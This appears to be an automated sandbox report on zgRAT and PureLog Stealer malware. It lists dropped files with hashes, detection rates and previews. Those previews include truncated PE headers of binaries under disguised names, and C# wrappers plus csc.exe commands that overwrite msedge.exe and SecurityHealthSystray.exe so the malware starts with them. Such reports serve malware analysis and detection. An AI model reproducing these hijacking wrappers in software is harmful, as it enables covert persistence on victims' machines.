                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tl.f................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H...........|............................................................0..........(.... ........8........E....\.......)...M...8W...(.... ....~....{~...9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E............S...............8....~....:{... ....~....{n...9....& ....8.......... ....~....{....:....& ....8........~....(D...~....(H... ....<.... ....8d...r...ps....z*8.... ....~....{h...:?...& ....84...~....(<... .... .... .

                              C:\Program Files\Windows Security\BrowserCore\en-US\54f8e4f5b93f5a

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with very long lines (845), with no line terminators
                              Category:dropped
                              Size (bytes):845
                              Entropy (8bit):5.897614772047287
                              Encrypted:false
                              SSDEEP:12:Cr42WpCrApUCl5glvZXzcet9oMPDeSdef8Yjz4sTW17bJEj+2+tazYMLegG:04UGqlBzt9rLSUYjz4d2+btkyx
                              MD5:ECBAAB294C165D0E25952251D1A8AF6E
                              SHA1:15F7DA23E33A613565F716EC0D01F4474A4216A5
                              SHA-256:B018C02EB84BED011EABAB1BB6D25CF277DBED9B7CDC5F69120C8BAE131AE404
                              SHA-512:B561897E467A566150788D183C05E71E4A036359649A7E404A09F9119E49F71F9B56FBEF8559238BA6C7D98C860E0160C23668A7DF1FEDB8059540F8339E1DE5
                              Malicious:false
                              Preview:TJUr04pR7GbJpeJcef03IIBYp1pQPFPTbUFxTojnO9hWlStEJTWVDbrLI6C9PYB21IsUYVIz5MpIlowXIkH6t4P9m3pXmkYz8ofdkYpyKgZ1wjkdKo1oREI72ssepvMVx0K6JTwt4SwMeYNDTMM7suh3gik1pLIYTED5YoU12Ht9S6cefoLdiPmDSRaks5DtJX3ZURop1VFlAikjGFWA9pzEcAmHOtI7DAz5DCKOAgmNJACuq0eniDtehy7TohbHNIhAspgD5IAdDm5b72bXPeYAQUYOF0jcFe9AcCCBTasaCQb43fWwGD2tuhuXQS8EihYin484zZEyw7793dUjexWBmQQ5SouAcn2e22R9gb6q8D6wjuew7YkuLW6WnDmLpDWJFdHBMVCC0qCiTeWiK7DDCHTf64VdyuA5rxrFmdjmWi3eTXDJrDBrASG7KlES9iNGpH1gwQ5rXareNyMi0MwutT4Yqt5AYRmxUxzLggWaIUTjlmtVZgcxvcWWMczDU5SGx3KZ9ACUzWmZAUxE9jk1zzB1bc9DqTFMBMwscTWZeH7Zz6W2ovDvUbR81S8gB8ngQaYxiFlpNLXr1lBeGGY5PU2j4x0JVzYgebJZiiTjKXhJDkHPRdZ4jsQ5hy3vPbUYw1MZcl6ixzu1xsfTqk21Ze6wLO2tphUsDJWMYrxph1Gu7YHySjEojc8S4aONtM3PeCyoWT58wMThXMywGDaFdpJkKER8cj6V80P5kdc9oG1WJa4slcHpvxwz2NdRB6fNQ8jg73LmkbbWywbuKjXAcQjKEaCXAL8rkoGK1XvrReEUWZBGvtHbjfu9ZYcg0xmZctwJqQ3wy

                              C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tl.f................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H...........|............................................................0..........(.... ........8........E....\.......)...M...8W...(.... ....~....{~...9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E............S...............8....~....:{... ....~....{n...9....& ....8.......... ....~....{....:....& ....8........~....(D...~....(H... ....<.... ....8d...r...ps....z*8.... ....~....{h...:?...& ....84...~....(<... .... .... .

                              C:\ProgramData\dbg\088424020bedd6

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):248
                              Entropy (8bit):5.784020017648331
                              Encrypted:false
                              SSDEEP:6:m2Iq9YR3fBDBf0JosJsoZs34L/yZNmXpAK8eHwzvRF:m69M5Dd0lzs34L0yphjwzvr
                              MD5:3EAD95FD634626C32753A34629866057
                              SHA1:3E5ABE269E18EF4BCBAC064D5C16E3C90DBD4AEA
                              SHA-256:1CB6BC1DF5C79913CB8217FC2794522C1BB84F604B92A667A619943796CC95F1
                              SHA-512:D98407622A008DC7004F9AFDFBB9F5BAA91CB2283590CD2992CE3976608C8531CAB73B017201B96699D5C2B54F5166329C3D66C484803BF0F99F7B0B23342302
                              Malicious:false
                              Preview:h1TKZ8GaDKGSynKtpAIIVIqUSvLuLeDTRIuC2X4Y5MNr7BagaCzMA03ZL82oxWOjHwBq3I0SFtMJ58XRUpUJo0TaOV04eQlj7nkKAumSLhGQnueMkkTIBF4QdkbiR6xzInLRYNRkCB8HtCxe0oU46dh2sTqZSEBOtRHAiNyWTtGAGxgbx7rmm33pFTiEh1R7AtYc4w5n07lMWhv5wPmVXYmzXc5PotzbcIAXYEgABEwoSqShhmSSO6kl

                              C:\ProgramData\dbg\conhost.exe

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tl.f................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H...........|............................................................0..........(.... ........8........E....\.......)...M...8W...(.... ....~....{~...9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E............S...............8....~....:{... ....~....{n...9....& ....8.......... ....~....{....:....& ....8........~....(D...~....(H... ....<.... ....8d...r...ps....z*8.... ....~....{h...:?...& ....84...~....(<... .... .... .

                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1957888
                              Entropy (8bit):7.548545725494237
                              Encrypted:false
                              SSDEEP:24576:UaseMBOPMCPt3ZBngCi5OgpgPz3oOOMeqf3ocj7U45KQkBHiCXuKt7xiGRV:qNod2OgiPz3qMebcU4Et7MG
                              MD5:03EF05FF3B0C058220324C2CE72950F2
                              SHA1:1D82C1A36AD54002E93AB1665308343E8FBB3041
                              SHA-256:9D4430A9841B632DDFE2E41E4BA828A860194BC7A2B2F494655C2DB9841056C1
                              SHA-512:23C96AE50B2DA42FAB79D8BD0ABABC820E84A4A5C46473E916425C39AC4BB24FAEAF49FFC6D37B26D4E8B5E9BAB15D9951E6B1DCE12CBDF1C904930CA1B69772
                              Malicious:true
                              Yara Hits:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, Author: Joe Security
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 66%
                              • Antivirus: Virustotal, Detection: 55%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...tl.f................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H...........|............................................................0..........(.... ........8........E....\.......)...M...8W...(.... ....~....{~...9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E............S...............8....~....:{... ....~....{n...9....& ....8.......... ....~....{....:....& ....8........~....(D...~....(H... ....<.... ....8d...r...ps....z*8.... ....~....{h...:?...& ....84...~....(<... .... .... .

                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\e6c9b481da804f

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):279
                              Entropy (8bit):5.789804915950466
                              Encrypted:false
                              SSDEEP:6:ZWIIK5tOMcn1i4e51sLz68UKWczRGSwr0cghkktpNB8Wa1:ZRIocYsLDaU+rRghkk7b+
                              MD5:631C1C297D8462129BBDE3EFF97D1F14
                              SHA1:5B8A8E938394A95FC7792B19A3FB058E0B34A79C
                              SHA-256:8ED6065E580E092841C3D57F8BF45BA9D80C487216301192FF19A06C9B743CC7
                              SHA-512:3FBE75B22ED372A56E859637FC2FEF8DFB866019A0E90EB1E5A6C8D86CEFC193CDF0C81232E58B3EEE9098D48340DE1976D628FAA494C311AB3EE2B0F9839445
                              Malicious:false
                              Preview:DgHE3Hvc4O1d2o1mm1af0Un4wwwKjyH4MVW5msPifa1jxPFhXMBhgGas3MSHUl2GG7RgS5A4l19ZdDGgrPwXwkXF4nCZZIN4ivd08iPbMG5pGAPzFvZFyeTgjLlo3kfdnF1rkPiI9VLqos94YNTosIFDc7Rw7killcBAJhO0MRFcTn11MrQpQ1ufAyPn8wLZxjEMq8u08dbbCmuyFakPU2VurfAVSk1aFqptioKN7ZrxZTdXEahiL6F4OUfL8ZhYmAVW6AQbQXS4LiUXCmR1DTP

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ContainerAgentWinSession.exe.log

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1396
                              Entropy (8bit):5.350961817021757
                              Encrypted:false
                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                              MD5:EBB3E33FCCEC5303477CB59FA0916A28
                              SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                              SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                              SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NjWYKcLujkVoPzemFBeg.exe.log

                              Download File
                              Process:C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.354334472896228
                              Encrypted:false
                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                              Download File
                              Process:C:\ProgramData\dbg\conhost.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):847
                              Entropy (8bit):5.354334472896228
                              Encrypted:false
                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                              C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.0.cs

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                              Category:dropped
                              Size (bytes):399
                              Entropy (8bit):5.0704572473988
                              Encrypted:false
                              SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6F2iFkD:JNVQIbSfhV7TiFkMSfhW9FkD
                              MD5:37A0B84917D71D1EF11083315F913710
                              SHA1:76818A79D610A293A73B85915ABD5DE59168F3E9
                              SHA-256:5CD621AE4DD8BAB430EEE66FDE975D0A972BA3E430757FB38BB062339A9C2316
                              SHA-512:67F3FA71431DBA6C2E04532A5B8CF13B1AB3E6554180D2B2AF16ABF435AD9C435F3B5EC434C5B5DE85C30D2B974F48E8D6248198FBAE3ED66565F6924BC4C65D
                              Malicious:false
                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe"); } catch { } }).Start();. }.}.

                              C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                              Category:dropped
                              Size (bytes):251
                              Entropy (8bit):5.038845499831942
                              Encrypted:false
                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fdwDV6XH:Hu7L//TRq79cQyOO
                              MD5:22EB239E00639A20B549DA27D5ACA969
                              SHA1:9A8B14507E8334B5E3153BD98522E1A8903170E5
                              SHA-256:A97AA71F31204ECBD2B9E4ECC763C929C8298E9F2EC8AFC72A670796A5022C70
                              SHA-512:01AB1DE251C031FFB66EFA5B6221C37D69078F1B860DACB97114287D556B6262ED64F4A47971430D1872500A35C91DDC1270CC9975C0530DA9B0952AD8C39CD0
                              Malicious:false
                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.0.cs"

                              C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.out

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (319), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):740
                              Entropy (8bit):5.248154773834971
                              Encrypted:false
                              SSDEEP:12:UI/u7L//TRq79cQyOvKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:UI/un/Vq79tyOvKax5DqBVKVrdFAMBJj
                              MD5:1EEAF0A3E39204845A7C007B7914A298
                              SHA1:32109DD802A8BC467948E6AB645CB38913B2A4C4
                              SHA-256:C8F0333C4444ACEC6CB0C10BFA911FD8B14DEB70BB7F30FE71711CB6EADAC10F
                              SHA-512:980D3C8FC6C6073AC31BEB4E32D239C5C86316E74FA05762F26E904D561005EE88C0879077D2E57B1F392248BF0891492E7214ABEA6B3C5356B277BCC2140536
                              Malicious:false
                              Preview:.C:\FontHost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                              C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.0.cs

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                              Category:dropped
                              Size (bytes):414
                              Entropy (8bit):5.096435429200193
                              Encrypted:false
                              SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6F2iFkD:JNVQIbSfhWLzIiFkMSfhW9FkD
                              MD5:4E849CFD310597D236465DC35DF2D064
                              SHA1:8709065CA59891AF382D600EC037167FA24F384D
                              SHA-256:3FAC70C08D201963D7B24CAD027ABB5254553884EF22413202A15DD06FF82E18
                              SHA-512:AAC8137B60BA78302E5C95A0DBEF45CE1857E01458AAF56313FABAF5CCFACAB976A7FECF434D75CE059AA306EE6636D76E3A6FCB219EBCC12F8B0F7EC3853A04
                              Malicious:false
                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe"); } catch { } }).Start();. }.}.

                              C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                              Category:dropped
                              Size (bytes):266
                              Entropy (8bit):5.12343787191325
                              Encrypted:false
                              SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923f9Bh5Lx:Hu7L//TRRzscQyFj3
                              MD5:A491C57956F3144A10B847DFB10AF606
                              SHA1:11943E508A4EFF63EF54BFA80BB937A95BECE8AF
                              SHA-256:81BB1F795F9102621746DA2AC0F045D9066E6EAA0D21EF4286A2B86BC8D1432C
                              SHA-512:20C7E14BC96F9A1AADD59E5A12DDEE6AB97BDA741F075556DF2218E64D612FB7A40E52287992A3F6BE66692AE8DD5B86D7428B1E8A7DCA0120BF5F4DDE04AC50
                              Malicious:true
                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.0.cs"

                              C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.out

                              Download File
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (334), with CRLF, CR line terminators
                              Category:modified
                              Size (bytes):755
                              Entropy (8bit):5.25685794359289
                              Encrypted:false
                              SSDEEP:12:UI/u7L//TRRzscQyFj+KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:UI/un/VRzstyh+Kax5DqBVKVrdFAMBJj
                              MD5:8C092BBDC77512108837381FD0C45156
                              SHA1:F19A0640EF3079831DBA4FD6A7E2711384274944
                              SHA-256:6728339C705AF70A7AB94349B91DE064CEB50AA12D23EC0EF7BD5AD2C4138CF1
                              SHA-512:7D32CE3AB059FE1EF73B1E7D019F9B276E80EFD815E123005C454DE6A0E40CA7E3473F8451EC7895BF6CA7BBBBFA8EC082A01B2D126000494BC02CC63747B0DB
                              Malicious:false
                              Preview:.C:\FontHost> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                              C:\Users\user\AppData\Local\Temp\1JeEX4hzC8

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):106496
                              Entropy (8bit):1.136413900497188
                              Encrypted:false
                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                              MD5:429F49156428FD53EB06FC82088FD324
                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                              Malicious:false
                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\6Bmvgk9A3S

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):40960
                              Entropy (8bit):0.8553638852307782
                              Encrypted:false
                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                              MD5:28222628A3465C5F0D4B28F70F97F482
                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                              Malicious:false
                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\8HDJWJWjsA

                              Download File
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.8439810553697228
                              Encrypted:false
                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
